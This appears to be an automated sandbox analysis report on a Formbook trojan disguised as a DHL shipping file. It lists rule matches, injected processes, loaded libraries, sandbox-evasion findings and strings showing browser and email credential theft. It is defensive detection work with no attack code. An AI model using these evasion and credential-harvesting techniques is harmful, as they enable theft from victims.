Source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/7

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AD37B5 GetLastError,FormatMessageW,

0_2_00AD37B5

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AC10BF AdjustTokenPrivileges,CloseHandle,		0_2_00AC10BF
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00AC16C3

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AD51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00AD51CD

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AEA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00AEA67C

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00AD648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00AD648E

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00A642A2

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

File created: C:\Users\user\AppData\Local\Temp\Sancha

Jump to behavior

Source: DHL 745-12302024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000002.3880859561.0000000007B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE offer_merchant_domain (offer_id ;
Source: netbtugc.exe, 00000004.00000002.3875628569.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3875628569.0000000002E1E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1784718922.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1784825961.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1786936681.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL 745-12302024.exe	Virustotal: Detection: 39%
Source: DHL 745-12302024.exe	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\DHL 745-12302024.exe "C:\Users\user\Desktop\DHL 745-12302024.exe"
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 745-12302024.exe"
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 745-12302024.exe"	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL 745-12302024.exe

Static file information: File size 1569792 > 1048576

Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL 745-12302024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL 745-12302024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500025440.000000000071E000.00000002.00000001.01000000.00000004.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3875775604.000000000071E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 745-12302024.exe, 00000000.00000003.1419858833.0000000004180000.00000004.00001000.00020000.00000000.sdmp, DHL 745-12302024.exe, 00000000.00000003.1420549447.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1482196880.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1480290913.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.00000000034EE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.0000000003350000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1591339858.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1594270488.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 745-12302024.exe, 00000000.00000003.1419858833.0000000004180000.00000004.00001000.00020000.00000000.sdmp, DHL 745-12302024.exe, 00000000.00000003.1420549447.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1591979287.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1482196880.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1480290913.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3877078312.00000000034EE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.0000000003350000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1591339858.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1594270488.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1549965515.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591612436.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000003.1519574797.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3878368158.000000000397C000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000002C1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1891410540.000000001E83C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3878368158.000000000397C000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000002C1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1891410540.000000001E83C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1549965515.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591612436.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000003.1519574797.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp

Source: DHL 745-12302024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL 745-12302024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL 745-12302024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL 745-12302024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL 745-12302024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A642DE

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A80A76 push ecx; ret	0_2_00A80A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0261E2BA push 00000038h; iretd	2_2_0261E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026048A9 push esp; ret	2_2_026048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026017E5 push ebp; retf 003Fh	2_2_026017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_026147A2 push es; iretd	2_2_026147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02603780 push eax; ret	2_2_02603782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0261A436 push ebx; iretd	2_2_0261A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02618C92 pushad ; retf	2_2_02618C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0261A5D9 push ebx; iretd	2_2_0261A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300225F pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030027FA pushad ; ret	2_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300283D push eax; iretd	2_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300135E push eax; iretd	2_2_03001369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033809AD push ecx; mov dword ptr [esp], ecx	4_2_033809B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00802238 pushad ; iretd	4_2_00802239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080AB37 push 00000038h; iretd	4_2_0080AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00806CB3 push ebx; iretd	4_2_00806E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00800EAB push ebp; retf	4_2_00800EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00806E56 push ebx; iretd	4_2_00806E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080101F push es; iretd	4_2_00801027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080D1B0 push es; ret	4_2_0080D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007F1126 push esp; ret	4_2_007F1127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080550F pushad ; retf	4_2_00805510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080FEF5 push FFFFFFBAh; ret	4_2_0080FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_007FFFA0 push esi; iretd	4_2_007FFFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030903DA push ebx; ret	4_2_0309042C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03094268 push cs; retf	4_2_030942F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309429A push cs; retf	4_2_030942F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_030947F5 push es; ret	4_2_030947FA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0309D620 push esi; ret	4_2_0309D63B

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00A7F98E
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00AF1C41

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97547

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	API/Special instruction interceptor: Address: 168F8BC
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0307096E rdtsc

2_2_0307096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9839

Jump to behavior

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3516	Thread sleep count: 134 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3516	Thread sleep time: -268000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3516	Thread sleep count: 9839 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3516	Thread sleep time: -19678000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe TID: 1172	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe TID: 1172	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe TID: 1172	Thread sleep time: -37000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A9C2A2 FindFirstFileExW,	0_2_00A9C2A2
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD68EE FindFirstFileW,FindClose,	0_2_00AD68EE
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00AD698F
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ACD076
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ACD3A9
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AD9642
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AD979D
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ACDBBE
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00AD9B2B
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00AD5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0080BAB0

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00A642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A642DE

Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: firefox.exe, 00000009.00000002.1893257222.0000021A5E7FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
